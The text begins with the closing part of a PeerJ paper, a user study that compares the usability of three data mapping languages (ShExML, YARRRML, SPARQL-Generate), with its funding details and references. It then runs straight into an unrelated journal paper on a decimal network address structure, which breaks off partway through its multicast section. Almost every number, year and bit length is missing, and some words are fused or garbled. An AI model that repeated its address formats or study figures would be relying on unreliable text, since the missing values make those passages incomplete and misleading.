easiness, easiness of use and learnability, and between shexml and sparql-generate on mapping definition easiness and learnability comes to corroborate what we have elucidated with the objective analysis answering rq . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. review of the other variables shows that the users do not see much applicability on the three languages, that the design of the languages leads users to commit some errors during the development of the script and that the error reporting system in the three of them is not very useful to solve the incoming problems. the feedback received from the users in the error proneness and error reporting usefulness variables determines that these two aspects are the ones that should be improved in the three languages to improve their usability. this comes to answer the rq . for the modifiability variable assessed in task , shexml users tend to rate this feature with high marks whereas the single yarrrml user gave a response of in a point likert scale which is in line with his/her completeness percentage mark. as with the objective results of task , these subjective results should be further validated in future bigger experiments to corroborate these early findings. alignment with features comparison in the light of the statistical analysis outcome, sparql-generate design has been shown to have a negative impact on first-time users. this led to three users abandoning the task and low completeness scores for the rest of the group. although having more features in a language is something good and desirable, these results caught attention on how these features should be carefully designed and included in the language in order to improve easiness of use, and thus overall adoption of the tool. 
in the case of yarrrml language, although it has been designed with human-friendliness in mind, in our experiment it has not reached the expected results in comparison with shexml. however, it has better results than sparql-generate, suggesting it is less complex to use than that language, but still more complex than shexml. nevertheless, it does not seem that supported features could explain the differences between yarrrml and shexml as the features used on the experiment are more or less equal. instead other syntax details may be affecting the differences between these two groups such as: the use of keywords that made the language more self explanatory and the modularity used on iterators which reminds of object-oriented programming languages. however, this would require a broader study taking into account programming style background of participants and their own style preferences using techniques like a cognitive complexity architecture (hansen, lumsdaine & goldstone, ) to identify how each feature and its design is affecting the usability of each specific language. these results highlight the importance on how features are designed and included in a language. therefore, sparql-generate with more features and being a highly flexible language tends to have a bad influence on users’ usability. comparing shexml and yarrrml we see that these differences are smaller than with sparql-generate and that features support does not seem to be the variable affecting yarrrml usability. thus, we can conclude—and answer the rq —that it is not the features supported by a language which affects usability of first-time users but their design. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusions and future work inthisworkwehavecomparedtheusabilityofthreeheterogeneousdatamappinglanguages. the findings of our user study were that better results, and speed on finding this solution, are related to shexml users whereas sparql-generate users were not able to find any solution under study conditions. in the case of yarrrml users, they performed better than sparql-generate users but worse than shexml users finding partial solutions to the given problem. this study is (to our knowledge) the first to explore the topic of usability for first-time users with programming and linked data background in these kind of languages. it also reflects the importance that usability has on the accuracy of the encountered solutions and how features should be carefully designed in a language to not impact negatively on its usability. as future work, bigger experiments should be carried out with an emphasis on programming style background and styles (using cognitive complexity frameworks) to corroborate and expand these early findings. in addition, improving these aspects that were worst rated in the three languages (i.e., error proneness and the error reporting system) would enhance perceived user friendliness. this work highlights the importance of usability on these kind of languages and how it could affect their adoption. acknowledgements we want to thank the students of the master’s degree in web engineering for their willingness to participate in the experiment described in this work. 
additional information and declarations funding this work has been funded by the principality of asturias through the severo ochoa call (grant bp - ), by the ministry of economy, industry and competitiveness under the call of ‘‘programa estatal de i+d+i orientada a los retos de la sociedad’’ (project tin - -r), the cper nord-pas de calais/feder data advanced data science and technologies – , and the anr project datacert anr- -ce - . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: principality of asturias through the severo ochoa call: bp - . ministry of economy, industry and competitiveness under the call of ‘‘programa estatal de i+d+i orientada a los retos de la sociedad’’: tin - -r. the cper nord-pas de calais/feder data advanced data science and technologies - . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the anr project datacert: anr- -ce - . competing interests the authors declare there are no competing interests. author contributions • herminio garcía-gonzález conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • iovka boneva conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • sławek staworko and juan manuel cueva lovelle performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • josé emilio labra-gayo conceived and designed the experiments, performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the university of oviedo granted ethical approval to carry out the described study. data availability the following information was supplied regarding data availability: experiment data, supplemental material and raw data are available at github: https://github.com/herminiogg/shexml-paper- -data. references auer s, dietzold s, lehmann j, hellmann s, aumueller d. . triplify: light- weight linked data publication from relational databases. in: proceedings of the th international conference on world wide web, www , madrid, spain, april – , . – doi . / . . battle s. . round-tripping between xml and rdf. in: international semantic web conference (iswc), hiroshima, japan. battle s. . gloze: xml to rdf and back again. in: proceedings of the first jena user conference. berners-lee t, hendler j, lassila o. . the semantic web. scientific american ( ): – . bischof s, decker s, krennwallner t, lopes n, polleres a. . mapping be- tween rdf and xml with xsparql. journal on data semantics ( ): – doi . /s - - - . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/herminiogg/shexml-paper- -data http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. bizer c, seaborne a. . d rq-treating non-rdf databases as virtual rdf graphs. 
in: proceedings of the rd international semantic web conference (iswc ), vol. . proceedings of iswc . boneva i, labra gayo je, prud’hommeaux eg. . semantics and validation of shapes schemas for rdf. in: d’amato c, fernandez m, tamma v, lecue f, cudré-mauroux p, sequeda j, lange c, heflin j, eds. the semantic web—iswc . cham: springer international publishing, – . breitling f. . a standard transformation from xml to rdf via xslt. astronomische nachrichten ( ): – doi . /asna. . das s, sundara s, cyganiak r. . r rml: rdb to rdf mapping language. available at https://www.w .org/tr/r rml/ . deursen dv, poppe c, martens g, mannens e, de walle rv. . xml to rdf conversion: a generic approach. in: automated solutions for cross media content and multi-channel distribution, . axmedis ’ . international conference on. washington, – doi . /axmedis. . . dimou a, sande mv, colpaert p, verborgh r, mannens e, de walle rv. . rml: a generic language for integrated rdf mappings of heterogeneous data. in: proceedings of the workshop on linked data on the web co-located with the rd international world wide web conference (www ), seoul, korea, april , . ermilov i, auer s, stadler c. . csv rdf: user-driven csv to rdf mass conversion framework. in: proceedings of the isem, vol. . graz, austria, – . fagin r, kolaitis pg, miller rj, popa l. . data exchange: semantics and query an- swering. theoretical computer science ( ): – doi . /j.tcs. . . . field a. . discovering statistics using ibm spss statistics. thousand oaks: sage. fiorelli m, lorenzetti t, pazienza mt, stellato a, turbati a. . sheet rdf: a flexible and dynamic spreadsheet import&lifting framework for rdf. in: current approaches in applied artificial intelligence— th international conference on industrial, engineer- ing and other applications of applied intelligent systems, iea/aie , seoul, south korea, june – , , proceedings. – doi . / - - - - _ . freire f, freire c, souza d. . enhancing json to rdf data conversion with entity type recognition. in: proceedings of the th international conference on web information systems and technologies, webist , porto, portugal, april – , . – doi . / . garcía-gonzález h, fernández-Álvarez d, gayo jel. . shexml: an heterogeneous data mapping language based on shex. in: proceedings of the ekaw posters and demonstrations session co-located with st international conference on knowledge engineering and knowledge management (ekaw ), nancy, france, november – , . – . halevy ay. . answering queries using views: a survey. the vldb journal ( ): – doi . /s . han l, finin t, parr cs, sachs j, joshi a. . rdf : from spreadsheets to rdf. in: the semantic web—iswc , th international semantic web conference, garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asna. https://www.w .org/tr/r rml/ http://dx.doi.org/ . /axmedis. . http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. iswc , karlsruhe, germany, october – , . proceedings. – doi . / - - - - _ . hanenberg s. . faith, hope, and love: an essay on software science’s neglect of human factors. in: cook wr, clarke s, rinard mc, eds. proceedings of the th annual acm sigplan conference on object-oriented programming, systems, languages, and applications, oopsla , october – , , reno/tahoe, nevada, usa. acm, – . hansen me, lumsdaine a, goldstone rl. . cognitive architectures: a way forward for the psychology of programming. 
in: leavens gt, edwards j, eds. acm sympo- sium on new ideas in programming and reflections on software, onward! , part of splash ’ , tucson, az, usa, october – , . acm, – . hert m, reif g, gall hc. . a comparison of rdb-to-rdf mapping languages. in: proceedings of the th international conference on semantic systems. acm, – . heyvaert p, dimou a, herregodts a, verborgh r, schuurman d, mannens e, de walle rv. . rmleditor: a graph-based mapping editor for linked data mappings. in: the semantic web. latest advances and new domains— th international conference, eswc , heraklion, crete, greece, may –june , , proceedings. – doi . / - - - - _ . heyvaert p, meester bd, dimou a, verborgh r. . declarative rules for linked data generation at your fingertips!. in: the semantic web: eswc satellite events— eswc satellite events, heraklion, crete, greece, june – , , revised selected papers. – doi . / - - - - _ . lefrançois m, zimmermann a, bakerally n. . flexible rdf generation from rdf and heterogeneous data sources with sparql-generate. in: knowledge engineering and knowledge management—ekaw satellite events, ekm and drift-an- lod, bologna, italy, november – , , revised selected papers. – doi . / - - - - _ . lefrançois m, zimmermann a, bakerally n. . a sparql extension for generating rdf from heterogeneous formats. in: the semantic web— th international conference, eswc , portorož, slovenia, may –june , , proceedings, part i. – doi . / - - - - _ . meester bd, heyvaert p, verborgh r, dimou a. . mapping languages: analysis of comparative characteristics. in: chaves-fraga d, heyvaert p, priyatna f, sequeda jf, dimou a, jabeen h, graux d, sejdiu g, saleem m, lehmann j, eds. ceur workshop proceedings. joint proceedings of the st international workshop on knowledge graph building and st international workshop on large scale rdf analytics co-located with th extended semantic web conference (eswc ), portorož, slovenia, june , , vol. . ceur-ws.org, – . meester bd, maroy w, dimou a, verborgh r, mannens e. . rml and fno: shaping dbpedia declaratively. in: the semantic web: eswc satellite events— eswc satellite events, portorož, slovenia, may –june , , revised selected papers. – doi . / - - - - _ . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. michel f, djimenou l, faron-zucker c, montagnat j. . translation of relational and non-relational databases into rdf with xr rml. in: monfort v, krempels k, majchrzak ta, turk z, eds. webist —proceedings of the th international conference on web information systems and technologies, lisbon, portugal, – may, . scitepress, – . michel f, montagnat j, zucker cf. . a survey of rdb to rdf translation ap- proaches and tools. phd thesis, i s. available at https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_ rdf_translation_approaches_and_tools.pdf . miletic i, vujasinovic m, ivezic n, marjanovic z. . enabling semantic mediation for business applications: xml-rdf, rdf-xml and xsd-rdfs transformations. in: gonçalves rj, müller jp, mertins k, zelm m, eds. enterprise interoperability ii: new challenges and approaches. london: springer, – . müller h, cabral l, morshed a, shu y. . from restful to sparql: a case study on generating semantic sensor data. 
in: proceedings of the th international workshop on semantic sensor networks co-located with the th international semantic web conference (iswc ), sydney, australia, october nd, . – . prud’hommeaux e, labra gayo je, solbrig h. . shape expressions: an rdf validation and transformation language. in: proceedings of the th international conference on semantic systems, sem ’ . new york: acm, – . reinsel d, gantz j, rydning j. . the digitization of the world. from edge to core. technical report. seagate, idc. available at https://www.seagate.com/files/www- content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf (accessed on october ). sahoo ss, halb w, hellmann s, idehen k, thibodeau jr t, auer s, sequeda j, ezzat a. . a survey of current approaches for mapping of relational databases to rdf. w c rdb rdf incubator group report : – . scharffe f, bihanic l, képéklian g, atemezing g, troncy r, cotton f, gandon f, villata s, euzenat j, fan z, bucher b, hamdi f, vandenbussche p, vatant b. . enabling linked data publication with the datalift platform. in: semantic cities, papers from the aaai workshop, toronto, ontario, canada, july – , . sequeda jf, arenas m, miranker dp. . on directly mapping relational databases to rdf and owl. in: proceedings of the st world wide web conference , www , lyon, france, april – , . – doi . / . . slepicka j, yin c, szekely pa, knoblock ca. . kr rml: an alternative interpre- tation of r rml for heterogenous sources. in: hartig o, sequeda jf, hogan a, eds. ceur workshop proceedings. proceedings of the th international workshop on consuming linked data co-located with th international semantic web conference (iswc ), bethlehem, pennsylvania, usa, october th, , vol. . ceur- ws.org. sperberg-mcqueen cm, miller e. . on mapping from colloquial xml to rdf using xslt. in: extreme markup languages r©. montréal: online proceedings (mulberry technologies, inc.). garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_rdf_translation_approaches_and_tools.pdf https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_rdf_translation_approaches_and_tools.pdf https://hal.archives-ouvertes.fr/hal- /file/rapport_rech_i s_v _-_michel_et_al_ _-_a_survey_of_rdb_to_rdf_translation_approaches_and_tools.pdf https://www.seagate.com/files/www-content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf https://www.seagate.com/files/www-content/our-story/trends/files/idc-seagate-dataage-whitepaper.pdf http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. stadler c, unbehauen j, westphal p, sherif ma, lehmann j. . simplified rdb rdf mapping. in: bizer c, auer s, berners-lee t, heath t, eds. ceur workshop proceedings. proceedings of the workshop on linked data on the web, ldow , co-located with the th international world wide web conference (www ), florence, italy, may th, , vol. . ceur-ws.org. tandy j, herman i, kellogg g. . generating rdf from tabular data on the web, w c recommendation december . world wide web consortium. available at https://www. w .org/tr/ /rec-csv rdf- . theocharis s, tsihrintzis ga. . rdf serialization from json data: the case of json data in diavgeia.gov.gr. in: th international conference on information, intelligence, systems & applications, iisa , chalkidiki, greece, july – , . – doi . /iisa. . . thuy ptt, lee y-k, lee s, jeong b-s. . 
transforming valid xml documents into rdf via rdf schema. in: nwesp . third international conference on next generation web services practices, . nwesp . piscataway: ieee, – . thuy ptt, lee y-k, lee s, jeong b-s. . exploiting xml schema for interpreting xml documents as rdf. in: services computing, . scc’ . ieee international conference on, vol. . piscataway: ieee, – . garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www. w .org/tr/ /rec-csv rdf- http://dx.doi.org/ . /iisa. . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , research of new network address structure chong jiao . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com xie jianping . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: @ .cn xu yinqiu . chinese decimal network working group . shanghai decimal system network information technology ltd. e-mail: @ .com, zhao hongwen shandong radio, television and network co., ltd. tai 'an branch. e-mail: tagdglcs@qq.com abstract—with the wide application of internet technology, the number of hosts accessing the internet has grown rapidly, and addresses will be more and more widely used in other intelligent terminals such as e-commerce logistics codes, space codes, identity codes, and d geocodes. the number of existing addresses is no longer sufficient for this development demand. the emergence of ipv temporarily alleviated the problem of ip address shortage, and ipv did not fully consider the security of data transmission at the beginning of design. chinese researchers have proposed a new internet address architecture, that is, method of using whole digital code to assign address for computer, referred to as ipv . ipv extends address capacity; supports more address hierarchies, more addressable nodes, and simpler automatic address configuration. based on the study of ipv and ipv address structure, this paper designs the standards of the new generation network address structure, including ipv unicast address structure, cluster address structure and multicast address structure, which provides a solid foundation for new generation of internet research. keywords-addressing; address structure; ipv ; decimal network i. introduction at the beginning of the internet development, ipv addresses were sufficient and successful, but in the last years of the th century, the global internet was growing rapidly, and the number of hosts connected to the internet was growing exponentially every year. therefore, the number of existing addresses is no longer sufficient for this development demand. ipv solves the problem of address shortage in ipv , but it does not fully consider the network security problem in design. there are many security risks, and ipv is not compatible with the original ipv . in order to adapt to the network development, chinese researchers proposed a new network address architecture. this structure adopts a method of using whole digital code to assign address for computer and intelligent terminal. it is input to a computer through various input devices of a computer and a smart terminal, and combines software and hardware of various computers. the external addresses of the networked computers and doi: . 
/ijanmc- - international journal of advanced network, monitoring and controls volume , no. , intelligent terminals are compiled corresponding to the addresses of the internal operations of the computer through various transmission media. this new address allocation method can provide sufficient address space for the future development of the internet, and this new one also provides sufficient information for various personal information appliances and e-commerce logistics and personal communication terminal applications. this also ensures that the address hierarchies can have more layers. the ip address length from bits to bits to , to support more address hierarchies, more addressable nodes and simpler automatic address configuration. at the same time, the -bit address length of ipv has been reduced to bits to solve the quick use of cellular communication in mobile communication. ii. address text representation the decimal network address is expressed in "brackets in decimal", that is, y[y[y[y[y[y[y[y[y, where each y represents a - bit long integer in decimal. such as: [ [ [ [ [ [ [ . in the address representation, multiple consecutive zeros on the left of each decimal number can be omitted, but all zero decimal numbers need to be represented by a zero. for example, the above address can be written as: [ [ [ [ [ [ [ ]. in order to further simplify the representation of address, we can address the entire continuous field zero can be represented by "[x]" (x is the number of stages of the all-zero field). for example, the above address can be abbreviated as [ ] [ [ ]. the decimal network address prefix uses a cidr (classless inter-domain routing) like representation, which has the following form: ipv address/address prefix length. the ipv address is an address written by the ipv address representation, and the address prefix length is the number of consecutive digits from the leftmost part of the address to indicate the address prefix. the decimal number is used in the ipv address, but the prefix length refers to the binary. for example: -bit address prefix [ [ [ [ [ [ can be expressed as: [ [ [ [ [ [ [ / or [ ] [ [ ]/ . in the representation of the address prefix, the ipv address to the left of the slash "/" must be restored to the correct address. ipv addresses are assigned to interfaces, not nodes. the ipv address specifies a -bit identifier for the interface and interface group. there are three types of addresses: a single interface with a single unicast address, anycast address, and a multicast address. iii. unicast address structure the unicast address is the identifier of a single network interface, and the packet with the unicast address as the destination address is sent to the unique network interface identified by it. the address hierarchy of the unicast address is very similar in form to the cidr address structure of ipv , and they all have consecutive address prefixes and address codes of arbitrary length. ipv 's unicast address has the following forms: aggregate global unicast address, decimal internet address and domain name decision and assignment organization address, ipx address, local ipv unicast address, and ipv compatible address. the aggregatable global unicast address and cluster address belong to the unicast address. they are not different in form, but differ in the propagation mode of the message. therefore, the aggregatable unicast address and cluster address are assigned the same format prefix . 
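Before moving on to the individual address types, the bracket-decimal text representation of Section II can be made concrete with a small sketch. The exact number of segments, the per-segment bit width and the precise rendering of the "[x]" zero-run abbreviation are not fully specified in the text above, so the choices below (eight segments, marker written inline, example values) are illustrative assumptions rather than values taken from the specification.

    # Rough sketch of the "brackets in decimal" text notation described above.
    # SEGMENTS and the example values are assumptions for illustration only.
    SEGMENTS = 8

    def to_text(segments):
        """Plain form: decimal segments joined by '[' with leading zeros dropped."""
        return "[".join(str(s) for s in segments)

    def compress(segments):
        """Collapse the longest run of all-zero segments into a single [x] marker."""
        best_start = best_len = 0
        run_start = run_len = 0
        for i, s in enumerate(segments):
            if s == 0:
                if run_len == 0:
                    run_start = i
                run_len += 1
                if run_len > best_len:
                    best_start, best_len = run_start, run_len
            else:
                run_len = 0
        if best_len < 2:
            return to_text(segments)
        head = segments[:best_start]
        tail = segments[best_start + best_len:]
        return to_text(head) + "[" + str(best_len) + "]" + to_text(tail)

    def with_prefix(segments, prefix_bits):
        """CIDR-like form: the address text followed by /prefix-length in bits."""
        return f"{compress(segments)}/{prefix_bits}"

    print(to_text([86, 0, 0, 0, 0, 0, 21, 771]))       # 86[0[0[0[0[0[21[771
    print(with_prefix([86, 0, 0, 0, 0, 0, 21, 771], 96))  # 86[5]21[771/96

As described above, the prefix form simply appends the binary prefix length after a slash, while the address part itself stays in decimal.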
both the local link unicast address and the in-station unicast address are used in the local range. to facilitate the router to speed up the identification of these two types of addresses, and address format prefix are assigned to them respectively. international journal of advanced network, monitoring and controls volume , no. , a. aggregate global unicast address the internet has a tree topology hierarchy. in order to better express this hierarchy, ipv introduces a multi-hierarchical addressable address. organizations at all levels of the internet are assigned their own identity (address prefix) in the address, and each organization identity is assigned based on the higher-level agency identity to which it is directly affiliated. different levels of the internet routing systems can only distinguish subnet identifiers in the address above its level, that is, low-level network structures are transparent in high-level nodes. in this way, the low-level subnets are aggregated at a high level, sharing a high-level subnet number, which are represented by an item in the high-level router routing table. the aggregatable global unicast address is the most widely used unicast address when a node is connected to the internet. this kind of address is used primarily to support network vendor-based address aggregation and network intermediary based address aggregation. the use of aggregatable global unicast addresses can effectively aggregate subnets in all levels of routing systems, thereby reducing the size of the routing table. ) introduction of aggregatable global unicast address the multi-level network structure has good scalability, which is beneficial to solve the problem of routing addressing. like the telephone network, ipv has a good hierarchical structure for aggregatable global unicast addresses, which can have the following three levels: a) public topology layer: the public topology layer is a collection of network providers and network intermediaries that provide public internet transit services. b) site topology layer: the site topology layer is limited to specific sites or organizations that do not provide public internet transit services to off-site nodes. c) network interface identification: the network interface identifier is used to identify the network interface on the link. ) structure of aggregatable global unicast address the ipv aggregatable global unicast address consists of six domains: address format prefix (fp), top-level aggregation identifier (tla), reserved domain (res), secondary aggregation identifier (naa), and site-level aggregation identifier (sla), and network interface identification. in order to reduce the difficulty of readdressing when changing network access, the lengths of these six domains are fixed, the structure of aggregatable unicast addresses is shown in table : table i. aggregate unicast address structure bits bits bits fp tla logo res nla identifier sla identifier network interface identifier public topological layer site topology layer network interface identifier a) format prefix: the format prefix of the aggregatable global unicast address is defined as a " " four-bit binary string. with this address format prefix, the routing system can quickly distinguish whether an address is an aggregatable global unicast address or other type of address. b) top level aggregation identifier: the top-level aggregate identifier is the highest level in the routing hierarchy. 
default router must be given each international journal of advanced network, monitoring and controls volume , no. , active polymerization top of an identifier correspondence, and provide the top aggregation in the identifier represents the address of the region of the routing information. currently, the top-level aggregation identifier is bits and can support network switcher nodes, remote network providers, or backbone network service provider nodes. c) secondary aggregation identifier: the organization using two polymerization identification to establish internal addressing hierarchy and identifier within the site which have top level aggregation identifier. the organization with top-level aggregation identifier has -bits secondary aggregation identifier space, that is, if the organization directly allocates these secondary aggregation identifiers, it can allocate . the - bit long secondary aggregation identifier divides the first-level nla of n bits, and the remaining ( -n) bits serve as site ids. the allocation scheme of the secondary aggregation identifier is a compromise between route aggregation efficiency and flexibility. when an organization allocates its internal secondary aggregation identifier, it can select an allocation scheme according to its own needs. establishing a hierarchy allows the network to aggregate to a greater degree at all levels of the router, and to make the routing table smaller. directly assigning a secondary aggregated identifier simplifies the allocation process, but results in excessive routing table size. d) site-level aggregation identifier: site-level aggregation identifier is used for individual organizations (sites) to establish their internal addressing hierarchy and identity subnets. the site-level aggregate identifier is similar to the ipv subnet number, except that the ipv site can accommodate a larger number of subnets. the -bit site-level aggregation identifier domain can support , , , subnets, which is sufficient to support the subnet size within most organizations. an organization can directly assign its site-level aggregation identifiers. there is no logical relationship between the site-level aggregation identifiers, and the routing table size of the router is large. it is also possible to divide two or more layers of structures within a site-level aggregation identifier domain. e) network interface identifier: the network interface identifier is used to identify the network interface on a link. on the same link, each network interface identifier must be unique. the aggregatable global unicast address ultimately identifies a network interface (or node) at the network interface level. in many cases, the network interface identifier is the same as the link layer address of the network interface, or based on the link layer address of the network interface. the same network interface identifier can be used on multiple interfaces of the same node, which are only treated as one network interface on the network. b. local link unicast address the local link unicast address is used for communication between nodes on the same link. this type of address has a separate address format prefix " " for efficient addressing on this link. this type of address is used for automatic configuration of addresses, neighbor detection, and there are no routers on the link. if there are routers on the link, these routers do not forward ipv packets to other links which have the local link unicast address as the destination address the source address. 
the structure of the local link unicast address is very simple. it consists directly of the address format prefix and the - bit network interface identifier, and is filled with bits of , as shown in the table . international journal of advanced network, monitoring and controls volume , no. , table ii. local link unicast address structure bits bits bits network interface identifier an in-site unicast address can be used when it is desired to address the network interface of the communication within the site and does not wish to use the global address format prefix. at the same time, the station's unicast address is also used for the addressing of isolated sites that are independent of the internet, such as addressing in a campus network that is not connected to the internet. because the scope of the unicast address in the station is much larger than the range of the local link unicast address, and a site often contains multiple subnets, the structure of the unicast address in the station is more than that of the local link. the format prefix assigned to the unicast address in the station is " ". the specific structure of the address is shown in the table . table iii. structure of the unicast address in the station bits bits bits bits subnet identifier network interface representation similar to the use of the local link unicast address, ipv packets with the source address or destination address in the station can only be propagated within the site. the router cannot forward these packets out of the site. c. compatible address in ipv , some mechanisms for smoothing the transition from ipv /ipv to ipv have been developed, including the use of existing ipv and ipv routing systems as tunnel forwarding ipv packet technologies. for ipv nodes using this technology, it is required to assign several special ipv addresses of "ipv compatible address", "ipv compatible address" and "special compatible address". the specific structure of these addresses is shown in the table - : table iv. compatible address format bits bits bits bits bits bits bits prefix reserved sign scope dedicatedipv ipv address table v. ipv mapped address format bits bits bits bits [ [ ipv address table vi. mapped address format bits bits bits [ [ ipv address international journal of advanced network, monitoring and controls volume , no. , table vii. mapping address format for special compatible addresses bits bits bits bits [ [ ipv address iv. cluster address structure in many cases, there may be multiple servers on the network that provide the same service at the same time (for example, a mirror server). a host, an application or a user often only wants to get a service without paying attention to which server the service is provided, that is, only one of all these servers is required to serve the user. anycast transmission mechanism is proposed to meet such needs on the network. the mechanism uses the cluster address to identify the set of servers that provide the same service. when a user sends a message to the cluster address, the network sends the message to at least one server that owns the cluster address. a cluster address is a type of ipv address that is simultaneously assigned to multiple network interfaces. the ipv message destined for the destination address of the cluster address will be sent to the interface that owns the cluster address. the routing protocol considers the nearest one, that is, only one interface can receive the packet. 
the cluster address of ipv is allocated from the unicast address and is defined in the same format as the unicast address, that is, the cluster address is formally indistinguishable from the unicast address. when a unicast address is assigned to multiple network interfaces, it is functionally translated into a cluster address. the node that gets the cluster address must perform the appropriate configuration process to recognize that the address is a cluster address. for each assigned cluster address, it always has a longest prefix p to identify the minimum containment level of all network interfaces that have the cluster address in the network topology. for example, each school in a school has an image of an ftp server, and the minimum inclusion of all of these servers may be the highest level in the school's network structure. the corresponding prefix p is used to identify the highest network level. within the network hierarchy identified by the prefix p of a cluster address, each member that owns the address must be published as a separate item in the routing system (often referred to as host routing); outside the hierarchy identified by the prefix p all member network interfaces identified by the cluster address can be aggregated into one item to be published in the routing system. it is worth noting that in the worst case, the prefix p of a cluster address may be in length, that is, the distribution of the network interface that owns the cluster address in the internet cannot form a topology, so all of these networks are included. the smallest hierarchy of interfaces is the entire internet. in this case, each node corresponding to the cluster address must be published on the internet as a separate item. this severely limits the number of such global cluster address sets that the routing system can support. therefore, the internet may not support a global set of cluster addresses, or only provide extremely restrictive support. at present, the use and implementation mechanism of ipv for cluster addresses are still being researched and tried. there are three types of cluster addresses that have been identified so far:  identify a collection of routers in an organization that provides internet services. at this time, the cluster address can be used as the intermediate router address in the extension header of the packet source path, so that the packet is converted by any router of the designated network service access organization. international journal of advanced network, monitoring and controls volume , no. ,  identify the set of routers that connect to a particular subnet.  identify a set of routers that provide routing information to a certain network area. because the experience of using cluster addresses in a wide range is rare, and there are some known problems and dangers in the use of cluster addresses, before accumulating a lot of experience with cluster addresses and finding solutions to cluster address ills, the following restrictions must be adhered to when implementing an ipv cluster address:  the cluster address cannot be used as the source address in the ipv message;  the cluster address can only be assigned to the router at present, but not to the normal ipv host node. currently, the ipv protocol only predefines a cluster address – the subnet router cluster address. this kind of address must be owned and must be identifiable by each subnet router. the specific format is shown in the table : table viii. 
subnet router cluster address n bits -n bit subnet prefix host number (all ) the entire subnet router cluster address, as its name implies, is the cluster id of all routers connected to the link subnet. its purpose is to allow applications on one node to communicate with one of all router collections on the remote subnet. v. multicast structures multicast is used when implementing the network multicast mechanism. the ipv protocol also adopts a multicast mechanism and specifically designed a multi-purpose address for multicast use. the address space prefixed with the address format in the address space of ipv is reserved for multicast. the multicast address is assigned to multiple network interfaces in the same way as the cluster address. the difference between the two is that ipv packets with the destination address of the multicast address will be received by all network interfaces that have the multicast address at the same time. this sending process is called multicast. a collection of network interfaces that have the same multi-cast address is called a multicast group. the multicast address of ipv consists of four parts, with " " as the address format prefix. the specific structure is shown in the table . table ix. ipv multicast address format bits bits bits bits sign range of action group identification the remaining three parts of the format followed by the address format prefix are the flag bit field, the address scope field, and the group identification field. the flag bit field consists of bits, the flag bit field uses only the lowest bit of the bits (t bit), and the remaining upper seven bits are reserved. the t bit is called the "temporary address bit" and it indicates that the assigned multicast address is temporarily valid or permanent. the address range is an integer consisting of bits. it is used to limit the distribution range of multicast group members, thus limiting the effective range of the multicast address relative to the sender of international journal of advanced network, monitoring and controls volume , no. , the message during multicast. group identification field for a multicast group, it is in the low among the entire address format. a multicast group identified by a group identity field may be a temporary or permanent multicast group within a given range. a. universal multicast address in the design of ipv , some common multicast addresses are predefined, such as reserved multicast address, all-node multicast address, all router multicast address, and the requested node multicast address. these addresses are typically used when neighboring nodes are probed and the address is automatically configured. ) reserved multicast address: multicast address with group identifier of can only be reserved but cannot be assigned to any multicast group, that is, the flag bit is , the address range is arbitrary, and the group id is all . the addresses at the time are all reserved multicast address addresses. ) all node multicast address addresses: general multicast addresses [ ] and [ ] are all node multicast addresses, which identify all nodes within the scope of the node and within the scope of the link. these two addresses function similarly to the broadcast address in ipv and are used to send broadcast messages within their corresponding scope. ) all routers multicast address: it contains the following three general multicast address addresses, which identify all routers in range (scop= , on the same node), in range (scop= , on the same link). 
